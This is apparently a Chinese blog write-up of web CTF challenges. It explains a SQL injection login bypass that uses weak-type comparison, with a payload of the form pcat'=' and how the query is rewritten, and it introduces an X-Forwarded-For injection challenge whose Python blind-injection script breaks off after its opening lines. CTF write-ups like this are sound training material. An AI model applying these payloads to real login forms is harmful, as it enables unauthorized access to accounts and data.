实验吧CTF-web

本文介绍了CTF比赛中的多种SQL注入问题,包括登陆页面的SQL注入,利用弱类型比较构造万能密码;xff注入的绕过策略;以及不同类型的SQL注入实战,如使用tamper工具进行空格和关键字的转义。此外,还提到了base64编码的快速转换和编码绕过技术。文章最后提到了一些隐藏参数和源码查看在解决挑战中的作用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

登陆一下好吗

类型:sql注入

已经过滤了/ # -- select or union |等,但是没有过滤单引号

payload:username=pcat'='&password=pcat'='

原sql语句为:

select * from user where username='用户名' and password='密码'

拼接后为:

select * from user where username='pcat'='' and password='pcat'=''

计算机首先计算username='pcat',返回为0(false),再计算0=”,结果为1
最终语句等同于

select * from user where 1 and 1

select * from user 

关于弱类型的比较:
以下情况都会为true
1=’1’
1=’1.0’
1=’1后接字母(再后面有数字也可以)’
0=’除了非0数字开头的字符串’
(总体上只要前面达成0的话,要使语句为true很简单,所以这题的万能密码只要按照我上面的法子去写一大把)


who are you?

类型:xff注入

# -*- coding: utf-8 -*-
import requests
import time

payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.{}-'
flag = ''
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值